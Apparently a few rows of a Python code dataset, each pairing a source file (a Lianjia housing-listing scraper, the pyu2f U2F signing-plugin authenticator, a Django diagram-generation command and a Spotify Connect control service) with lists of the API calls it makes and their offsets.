return OrderedDict({'title': pq('div.content > div.title > h1').text().strip(),
'sub_title': pq('div.content > div.title > div.sub').text().strip(),
'price': pq('div.price > span.total').text().strip(),
'unit_price': pq('div.unitPrice > span.unitPriceValue').text().replace('元/平米', '').strip(),
'down_payment_info': pq('div.tax > span.taxtext').text().strip(),
'area': re.search('(\d+\.?\d*)', pq('div.area > div.mainInfo').text()).group(1),
'year_info': pq('div.area > div.subInfo').text().strip(),
'house_type': pq('div.room > div.mainInfo').text().strip(),
'floor': pq('div.room > div.subInfo').text().strip(),
'towards': pq('div.type > div.mainInfo').text().strip(),
'housing_estate': pq('div.communityName > a:first').text().strip(),
'housing_estate_link': pq('div.communityName > a:first').attr('href'),
'location': tuple([i.text().strip() for i in pq('div.areaName > span > a').items()]),
'broker': pq('div.brokerName > a').text().strip(),
'broker_homepage': pq('div.brokerName > a').attr('href'),
'number': pq('div.houseRecord > span.info').text().replace('举报', '').strip()})
def start_parse_job(data_reader):
"""
解析任务(作业)
:param data_reader: 数据管道(读)
:return:
"""
# 构造进程池,按CPU核数初始化进程池大小,小于4核以4为准,否则以CPU核数为准
pool_size = mp.cpu_count() > 4 and mp.cpu_count() or 4
# 解析任务只使用下载任务进程池规模的一半(视情况而定,目前其处理速度要远大于下载任务,也避免进程过多)
pool = mp.Pool(pool_size // 2)
while True:
args = data_reader.recv()
if args is not None:
pool.apply_async(parse, args, callback=process)
pool.close()
pool.join()
def parse(content, url):
"""
解析网页
:param content:
:param url:
:return:
"""
if content is None or url is None:
return
try:
# 解析详情页,返回数据
return parse_item_page(content, url)
except Exception as e:
logging.error(e)
def process(data):
"""
处理数据
:param data:
:return:
"""
if data is None:
return
# 数据基本处理
# 处理小区链接不完整问题
if 'housing_estate_link' in data and not data['housing_estate_link'].startswith('https://'):
data['housing_estate_link'] = 'https://sh.lianjia.com' + data['housing_estate_link']
# 数据转换
# 提取户型中的室数
if 'house_type' in data:
data['house_type'] = (data['house_type'].split('室')[0], data['house_type'])
# 数据存储(写入CSV文件,文件按日期生成)
with open(csv_file_path,
'a', encoding='utf-8', newline='') as f:
writer = csv.writer(f)
writer.writerow(data.values())
if __name__ == '__main__':
# 初始任务集合
init_tasks = set([base_url + '/'] + ['{}/pg{}/'.format(base_url, i) for i in range(2, 101)])
# 创建管道,用于任务(进程)间通信
(data_reader, data_writer) = mp.Pipe(duplex=False)
# 启动下载任务(写端)
mp.Process(target=start_download_job, args=(data_writer, init_tasks)).start()
# 启动解析任务(读端)
mp.Process(target=start_parse_job, args=(data_reader,)).start()
logging.info('--running--')
| [
"logging.basicConfig",
"multiprocessing.Process",
"pyquery.PyQuery",
"re.match",
"csv.writer",
"multiprocessing.cpu_count",
"requests.get",
"time.sleep",
"multiprocessing.Pool",
"multiprocessing.Lock",
"datetime.date.today",
"multiprocessing.Pipe",
"logging.info",
"logging.error"
]
| [((530, 539), 'multiprocessing.Lock', 'mp.Lock', ([], {}), '()\n', (537, 539), True, 'import multiprocessing as mp\n'), ((578, 599), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (597, 599), False, 'import datetime\n'), ((804, 916), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'format': '"""%(asctime)s - %(process)05d - %(levelname)s - %(message)s"""'}), "(level=logging.INFO, format=\n '%(asctime)s - %(process)05d - %(levelname)s - %(message)s')\n", (823, 916), False, 'import logging\n'), ((1204, 1222), 'multiprocessing.Pool', 'mp.Pool', (['pool_size'], {}), '(pool_size)\n', (1211, 1222), True, 'import multiprocessing as mp\n'), ((1309, 1330), 'multiprocessing.Pipe', 'mp.Pipe', ([], {'duplex': '(False)'}), '(duplex=False)\n', (1316, 1330), True, 'import multiprocessing as mp\n'), ((2927, 2959), 're.match', 're.match', (['list_page_pattern', 'url'], {}), '(list_page_pattern, url)\n', (2935, 2959), False, 'import re\n'), ((3091, 3116), 'pyquery.PyQuery', 'PyQuery', (['content'], {'url': 'url'}), '(content, url=url)\n', (3098, 3116), False, 'from pyquery import PyQuery\n'), ((3337, 3362), 'pyquery.PyQuery', 'PyQuery', (['content'], {'url': 'url'}), '(content, url=url)\n', (3344, 3362), False, 'from pyquery import PyQuery\n'), ((5095, 5118), 'multiprocessing.Pool', 'mp.Pool', (['(pool_size // 2)'], {}), '(pool_size // 2)\n', (5102, 5118), True, 'import multiprocessing as mp\n'), ((6430, 6451), 'multiprocessing.Pipe', 'mp.Pipe', ([], {'duplex': '(False)'}), '(duplex=False)\n', (6437, 6451), True, 'import multiprocessing as mp\n'), ((6643, 6670), 'logging.info', 'logging.info', (['"""--running--"""'], {}), "('--running--')\n", (6655, 6670), False, 'import logging\n'), ((6181, 6194), 'csv.writer', 'csv.writer', (['f'], {}), '(f)\n', (6191, 6194), False, 'import csv\n'), ((1173, 1187), 'multiprocessing.cpu_count', 'mp.cpu_count', ([], {}), '()\n', (1185, 1187), True, 'import multiprocessing as mp\n'), ((5007, 5021), 'multiprocessing.cpu_count', 'mp.cpu_count', ([], {}), '()\n', (5019, 5021), True, 'import multiprocessing as mp\n'), ((5557, 5573), 'logging.error', 'logging.error', (['e'], {}), '(e)\n', (5570, 5573), False, 'import logging\n'), ((6474, 6543), 'multiprocessing.Process', 'mp.Process', ([], {'target': 'start_download_job', 'args': '(data_writer, init_tasks)'}), '(target=start_download_job, args=(data_writer, init_tasks))\n', (6484, 6543), True, 'import multiprocessing as mp\n'), ((6574, 6629), 'multiprocessing.Process', 'mp.Process', ([], {'target': 'start_parse_job', 'args': '(data_reader,)'}), '(target=start_parse_job, args=(data_reader,))\n', (6584, 6629), True, 'import multiprocessing as mp\n'), ((1150, 1164), 'multiprocessing.cpu_count', 'mp.cpu_count', ([], {}), '()\n', (1162, 1164), True, 'import multiprocessing as mp\n'), ((2220, 2237), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (2232, 2237), False, 'import requests\n'), ((2690, 2703), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (2700, 2703), False, 'import time\n'), ((4984, 4998), 'multiprocessing.cpu_count', 'mp.cpu_count', ([], {}), '()\n', (4996, 4998), True, 'import multiprocessing as mp\n')] |
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class to offload the end to end flow of U2F signing."""
import base64
import hashlib
import json
import os
import struct
import subprocess
import sys
from pyu2f import errors
from pyu2f import model
from pyu2f.convenience import baseauthenticator
SK_SIGNING_PLUGIN_ENV_VAR = 'SK_SIGNING_PLUGIN'
U2F_SIGNATURE_TIMEOUT_SECONDS = 5
SK_SIGNING_PLUGIN_NO_ERROR = 0
SK_SIGNING_PLUGIN_TOUCH_REQUIRED = 0x6985
SK_SIGNING_PLUGIN_WRONG_DATA = 0x6A80
class CustomAuthenticator(baseauthenticator.BaseAuthenticator):
"""Offloads U2F signing to a pluggable command-line tool.
Offloads U2F signing to a signing plugin which takes the form of a
command-line tool. The command-line tool is configurable via the
SK_SIGNING_PLUGIN environment variable.
The signing plugin should implement the following interface:
Communication occurs over stdin/stdout, and messages are both sent and
received in the form:
[4 bytes - payload size (little-endian)][variable bytes - json payload]
Signing Request JSON
{
"type": "sign_helper_request",
"signData": [{
"keyHandle": <url-safe base64-encoded key handle>,
"appIdHash": <url-safe base64-encoded SHA-256 hash of application ID>,
"challengeHash": <url-safe base64-encoded SHA-256 hash of ClientData>,
"version": U2F protocol version (usually "U2F_V2")
},...],
"timeoutSeconds": <security key touch timeout>
}
Signing Response JSON
{
"type": "sign_helper_reply",
"code": <result code>.
"errorDetail": <text description of error>,
"responseData": {
"appIdHash": <url-safe base64-encoded SHA-256 hash of application ID>,
"challengeHash": <url-safe base64-encoded SHA-256 hash of ClientData>,
"keyHandle": <url-safe base64-encoded key handle>,
"version": <U2F protocol version>,
"signatureData": <url-safe base64-encoded signature>
}
}
Possible response error codes are:
NoError = 0
UnknownError = -127
TouchRequired = 0x6985
WrongData = 0x6a80
"""
def __init__(self, origin):
self.origin = origin
def Authenticate(self, app_id, challenge_data,
print_callback=sys.stderr.write):
"""See base class."""
# Ensure environment variable is present
plugin_cmd = os.environ.get(SK_SIGNING_PLUGIN_ENV_VAR)
if plugin_cmd is None:
raise errors.PluginError('{} env var is not set'
.format(SK_SIGNING_PLUGIN_ENV_VAR))
# Prepare input to signer
client_data_map, signing_input = self._BuildPluginRequest(
app_id, challenge_data, self.origin)
# Call plugin
print_callback('Please insert and touch your security key\n')
response = self._CallPlugin([plugin_cmd], signing_input)
# Handle response
key_challenge_pair = (response['keyHandle'], response['challengeHash'])
client_data_json = client_data_map[key_challenge_pair]
client_data = client_data_json.encode()
return self._BuildAuthenticatorResponse(app_id, client_data, response)
def IsAvailable(self):
"""See base class."""
return os.environ.get(SK_SIGNING_PLUGIN_ENV_VAR) is not None
def _BuildPluginRequest(self, app_id, challenge_data, origin):
"""Builds a JSON request in the form that the plugin expects."""
client_data_map = {}
encoded_challenges = []
app_id_hash_encoded = self._Base64Encode(self._SHA256(app_id))
for challenge_item in challenge_data:
key = challenge_item['key']
key_handle_encoded = self._Base64Encode(key.key_handle)
raw_challenge = challenge_item['challenge']
client_data_json = model.ClientData(
model.ClientData.TYP_AUTHENTICATION,
raw_challenge,
origin).GetJson()
challenge_hash_encoded = self._Base64Encode(
self._SHA256(client_data_json))
# Populate challenges list
encoded_challenges.append({
'appIdHash': app_id_hash_encoded,
'challengeHash': challenge_hash_encoded,
'keyHandle': key_handle_encoded,
'version': key.version,
})
# Populate ClientData map
key_challenge_pair = (key_handle_encoded, challenge_hash_encoded)
client_data_map[key_challenge_pair] = client_data_json
signing_request = {
'type': 'sign_helper_request',
'signData': encoded_challenges,
'timeoutSeconds': U2F_SIGNATURE_TIMEOUT_SECONDS,
'localAlways': True
}
return client_data_map, json.dumps(signing_request)
def _BuildAuthenticatorResponse(self, app_id, client_data, plugin_response):
"""Builds the response to return to the caller."""
encoded_client_data = self._Base64Encode(client_data)
signature_data = str(plugin_response['signatureData'])
key_handle = str(plugin_response['keyHandle'])
response = {
'clientData': encoded_client_data,
'signatureData': signature_data,
'applicationId': app_id,
'keyHandle': key_handle,
}
return response
def _CallPlugin(self, cmd, input_json):
"""Calls the plugin and validates the response."""
# Calculate length of input
input_length = len(input_json)
length_bytes_le = struct.pack('<I', input_length)
request = length_bytes_le + input_json.encode()
# Call plugin
sign_process = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
stdout = sign_process.communicate(request)[0]
exit_status = sign_process.wait()
# Parse and validate response size
response_len_le = stdout[:4]
response_len = struct.unpack('<I', response_len_le)[0]
response = stdout[4:]
if response_len != len(response):
raise errors.PluginError(
'Plugin response length {} does not match data {} (exit_status={})'
.format(response_len, len(response), exit_status))
# Ensure valid json
try:
json_response = json.loads(response.decode())
except ValueError:
raise errors.PluginError('Plugin returned invalid output (exit_status={})'
.format(exit_status))
# Ensure response type
if json_response.get('type') != 'sign_helper_reply':
raise errors.PluginError('Plugin returned invalid response type '
'(exit_status={})'
.format(exit_status))
# Parse response codes
result_code = json_response.get('code')
if result_code is None:
raise errors.PluginError('Plugin missing result code (exit_status={})'
.format(exit_status))
# Handle errors
if result_code == SK_SIGNING_PLUGIN_TOUCH_REQUIRED:
raise errors.U2FError(errors.U2FError.TIMEOUT)
elif result_code == SK_SIGNING_PLUGIN_WRONG_DATA:
raise errors.U2FError(errors.U2FError.DEVICE_INELIGIBLE)
elif result_code != SK_SIGNING_PLUGIN_NO_ERROR:
raise errors.PluginError(
'Plugin failed with error {} - {} (exit_status={})'
.format(result_code,
json_response.get('errorDetail'),
exit_status))
# Ensure response data is present
response_data = json_response.get('responseData')
if response_data is None:
raise errors.PluginErrors(
'Plugin returned output with missing responseData (exit_status={})'
.format(exit_status))
return response_data
def _SHA256(self, string):
"""Helper method to perform SHA256."""
md = hashlib.sha256()
md.update(string.encode())
return md.digest()
def _Base64Encode(self, bytes_data):
"""Helper method to base64 encode, strip padding, and return str
result."""
return base64.urlsafe_b64encode(bytes_data).decode().rstrip('=')
| [
"hashlib.sha256",
"base64.urlsafe_b64encode",
"subprocess.Popen",
"json.dumps",
"os.environ.get",
"struct.pack",
"pyu2f.model.ClientData",
"struct.unpack",
"pyu2f.errors.U2FError"
]
| [((2908, 2949), 'os.environ.get', 'os.environ.get', (['SK_SIGNING_PLUGIN_ENV_VAR'], {}), '(SK_SIGNING_PLUGIN_ENV_VAR)\n', (2922, 2949), False, 'import os\n'), ((5811, 5842), 'struct.pack', 'struct.pack', (['"""<I"""', 'input_length'], {}), "('<I', input_length)\n", (5822, 5842), False, 'import struct\n'), ((5933, 6001), 'subprocess.Popen', 'subprocess.Popen', (['cmd'], {'stdin': 'subprocess.PIPE', 'stdout': 'subprocess.PIPE'}), '(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n', (5949, 6001), False, 'import subprocess\n'), ((8145, 8161), 'hashlib.sha256', 'hashlib.sha256', ([], {}), '()\n', (8159, 8161), False, 'import hashlib\n'), ((3724, 3765), 'os.environ.get', 'os.environ.get', (['SK_SIGNING_PLUGIN_ENV_VAR'], {}), '(SK_SIGNING_PLUGIN_ENV_VAR)\n', (3738, 3765), False, 'import os\n'), ((5099, 5126), 'json.dumps', 'json.dumps', (['signing_request'], {}), '(signing_request)\n', (5109, 5126), False, 'import json\n'), ((6255, 6291), 'struct.unpack', 'struct.unpack', (['"""<I"""', 'response_len_le'], {}), "('<I', response_len_le)\n", (6268, 6291), False, 'import struct\n'), ((7352, 7392), 'pyu2f.errors.U2FError', 'errors.U2FError', (['errors.U2FError.TIMEOUT'], {}), '(errors.U2FError.TIMEOUT)\n', (7367, 7392), False, 'from pyu2f import errors\n'), ((7459, 7509), 'pyu2f.errors.U2FError', 'errors.U2FError', (['errors.U2FError.DEVICE_INELIGIBLE'], {}), '(errors.U2FError.DEVICE_INELIGIBLE)\n', (7474, 7509), False, 'from pyu2f import errors\n'), ((4248, 4324), 'pyu2f.model.ClientData', 'model.ClientData', (['model.ClientData.TYP_AUTHENTICATION', 'raw_challenge', 'origin'], {}), '(model.ClientData.TYP_AUTHENTICATION, raw_challenge, origin)\n', (4264, 4324), False, 'from pyu2f import model\n'), ((8357, 8393), 'base64.urlsafe_b64encode', 'base64.urlsafe_b64encode', (['bytes_data'], {}), '(bytes_data)\n', (8381, 8393), False, 'import base64\n')] |
import itertools
import os
from django.conf import settings
from django.core.management import call_command
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = 'Generates class diagrams.'
def handle(self, *args, **options):
if 'django_extensions' not in settings.INSTALLED_APPS:
exit('django_extensions not found, try using --setting kive.UML_settings')
docs_path = os.path.join(os.path.pardir, 'docs', 'models')
apps = [app for app in settings.INSTALLED_APPS
if not (app.startswith('django') or app == 'rest_framework')]
apps.sort()
for app in apps:
print(app)
exclude_models = ['User', 'Group']
if app != 'metadata':
exclude_models.append('AccessControl')
call_command("graph_models",
app,
pygraphviz=True,
group_models=True,
outputfile=os.path.join(docs_path, app+'.png'),
exclude_models=','.join(exclude_models))
readme_path = os.path.join(docs_path, 'README.md')
with open(readme_path, 'rU+') as f:
models_section = '### Models ###\n'
header = itertools.takewhile(lambda line: line != models_section,
f.readlines())
f.seek(0)
for line in header:
f.write(line)
f.write(models_section)
for app in apps:
f.write('#### {} ####\n'.format(app))
f.write('\n\n'.format(app, app))
| [
"os.path.join"
]
| [((442, 488), 'os.path.join', 'os.path.join', (['os.path.pardir', '"""docs"""', '"""models"""'], {}), "(os.path.pardir, 'docs', 'models')\n", (454, 488), False, 'import os\n'), ((1145, 1181), 'os.path.join', 'os.path.join', (['docs_path', '"""README.md"""'], {}), "(docs_path, 'README.md')\n", (1157, 1181), False, 'import os\n'), ((1019, 1056), 'os.path.join', 'os.path.join', (['docs_path', "(app + '.png')"], {}), "(docs_path, app + '.png')\n", (1031, 1056), False, 'import os\n')] |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import time
import json
import os
import sys
import time
import urllib
import socket
import argparse
import requests
import lib.common as common
base_url = 'http://localhost:24879/player/'
#------------------------------------------------------------------------------#
# do something on startup #
#------------------------------------------------------------------------------#
def init():
global port
check_port()
script_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(script_path)
parser = argparse.ArgumentParser(description='media manager spotify connect service')
parser.add_argument('-p', '--port', type=int, help='WEB server port', required=True)
args = parser.parse_args()
port = args.port
#------------------------------------------------------------------------------#
# check if librespot-java is running #
#------------------------------------------------------------------------------#
def check_port():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex(('localhost', 24879))
if result == 0:
sock.close()
return
print("Please check if SpoCon is configured correctly and running", file = sys.stderr )
sock.close()
exit(1)
#------------------------------------------------------------------------------#
# get metadata from spotify #
#------------------------------------------------------------------------------#
def get_metadata():
meta_data = {}
global current_cover
try:
current_track = get_player()
album = current_track['item']['album']
current_cover = album['images'][0]['url']
tmp_cover = current_cover
tmp_cover=tmp_cover.replace('https://i.scdn.co/image/','')
meta_data['track'] = current_track['item']['name']
meta_data['album'] = album['name']
meta_data['artist'] = album['artists'][0]['name']
meta_data['cover'] = 'external_' + tmp_cover
meta_data['playstatus'] = get_play_status()
if meta_data['playstatus'] == False:
meta_data['track'] = ''
meta_data['album'] = ''
meta_data['artist'] = ''
meta_data['cover'] = 'images/pause.png'
return(bytes(json.dumps(meta_data), 'utf-8'))
except:
meta_data['track'] = ''
meta_data['album'] = ''
meta_data['artist'] = ''
meta_data['cover'] = 'images/pause.png'
meta_data['playstatus'] = False
return(bytes(json.dumps(meta_data), 'utf-8'))
#------------------------------------------------------------------------------#
# get play status #
#------------------------------------------------------------------------------#
def get_play_status(mode=False):
playing = False
ret_val = False
ret_str = 'NO'
try:
current_track = get_player()
playing = current_track['is_playing']
except:
pass
if playing == True:
try:
path = 'http://localhost:24879/player/current/'
ret = requests.post(url = path)
data = ret.json()
if 'current' in data:
ret_str = 'YES'
ret_val = True
get_player()
except:
pass
if mode:
return(bytes(ret_str, 'utf-8'))
return(ret_val)
#------------------------------------------------------------------------------#
# get whats currently playing #
#------------------------------------------------------------------------------#
def get_current():
path = 'http://localhost:24879/player/current/'
ret = requests.post(url = path)
return ret.json()
#------------------------------------------------------------------------------#
# get player data from API #
#------------------------------------------------------------------------------#
def get_player():
path = 'http://localhost:24879/web-api/v1/me/player'
ret = requests.get(url = path)
return ret.json()
#------------------------------------------------------------------------------#
# read cover image fom spotify connect web #
#------------------------------------------------------------------------------#
def read_cover_image():
webURL = urllib.request.urlopen(current_cover)
data = webURL.read()
return(data)
#------------------------------------------------------------------------------#
# play next song #
#------------------------------------------------------------------------------#
def next():
requests.post(url = base_url + 'next')
#------------------------------------------------------------------------------#
# play previuous song #
#------------------------------------------------------------------------------#
def prev():
requests.post(url = base_url + 'prev')
#------------------------------------------------------------------------------#
# start playing #
#------------------------------------------------------------------------------#
def play():
requests.post(url = base_url + 'resume')
#------------------------------------------------------------------------------#
# stop playing #
#------------------------------------------------------------------------------#
def pause():
requests.post(url = base_url + 'pause')
#------------------------------------------------------------------------------#
# handle http get request #
#------------------------------------------------------------------------------#
def respond_to_get_request(data):
if 'action' not in data:
return(bytes('failed', 'utf-8'))
if data['action'] == 'play':
play()
elif data['action'] == 'pause':
pause()
elif data['action'] == 'prev':
get_metadata()
prev()
elif data['action'] == 'next':
get_metadata()
next()
elif data['action'] == 'metadata':
return(get_metadata())
elif data['action'] == 'coverimage':
return(read_cover_image())
elif data['action'] == 'getplaystatus':
return(get_play_status(True))
return(bytes('OK', 'utf-8'))
#------------------------------------------------------------------------------#
# main program #
#------------------------------------------------------------------------------#
init()
common.http_get_handler = respond_to_get_request
common.run_http(port)
while True:
time.sleep(2000)
| [
"requests.post",
"socket.socket",
"argparse.ArgumentParser",
"json.dumps",
"requests.get",
"time.sleep",
"os.chdir",
"lib.common.run_http",
"os.path.abspath",
"urllib.request.urlopen"
]
| [((7049, 7070), 'lib.common.run_http', 'common.run_http', (['port'], {}), '(port)\n', (7064, 7070), True, 'import lib.common as common\n'), ((587, 608), 'os.chdir', 'os.chdir', (['script_path'], {}), '(script_path)\n', (595, 608), False, 'import os\n'), ((622, 698), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""media manager spotify connect service"""'}), "(description='media manager spotify connect service')\n", (645, 698), False, 'import argparse\n'), ((1113, 1162), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (1126, 1162), False, 'import socket\n'), ((3909, 3932), 'requests.post', 'requests.post', ([], {'url': 'path'}), '(url=path)\n', (3922, 3932), False, 'import requests\n'), ((4286, 4308), 'requests.get', 'requests.get', ([], {'url': 'path'}), '(url=path)\n', (4298, 4308), False, 'import requests\n'), ((4614, 4651), 'urllib.request.urlopen', 'urllib.request.urlopen', (['current_cover'], {}), '(current_cover)\n', (4636, 4651), False, 'import urllib\n'), ((4954, 4990), 'requests.post', 'requests.post', ([], {'url': "(base_url + 'next')"}), "(url=base_url + 'next')\n", (4967, 4990), False, 'import requests\n'), ((5253, 5289), 'requests.post', 'requests.post', ([], {'url': "(base_url + 'prev')"}), "(url=base_url + 'prev')\n", (5266, 5289), False, 'import requests\n'), ((5552, 5590), 'requests.post', 'requests.post', ([], {'url': "(base_url + 'resume')"}), "(url=base_url + 'resume')\n", (5565, 5590), False, 'import requests\n'), ((5854, 5891), 'requests.post', 'requests.post', ([], {'url': "(base_url + 'pause')"}), "(url=base_url + 'pause')\n", (5867, 5891), False, 'import requests\n'), ((7087, 7103), 'time.sleep', 'time.sleep', (['(2000)'], {}), '(2000)\n', (7097, 7103), False, 'import time\n'), ((556, 581), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (571, 581), False, 'import os\n'), ((2441, 2462), 'json.dumps', 'json.dumps', (['meta_data'], {}), '(meta_data)\n', (2451, 2462), False, 'import json\n'), ((3296, 3319), 'requests.post', 'requests.post', ([], {'url': 'path'}), '(url=path)\n', (3309, 3319), False, 'import requests\n'), ((2695, 2716), 'json.dumps', 'json.dumps', (['meta_data'], {}), '(meta_data)\n', (2705, 2716), False, 'import json\n')] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.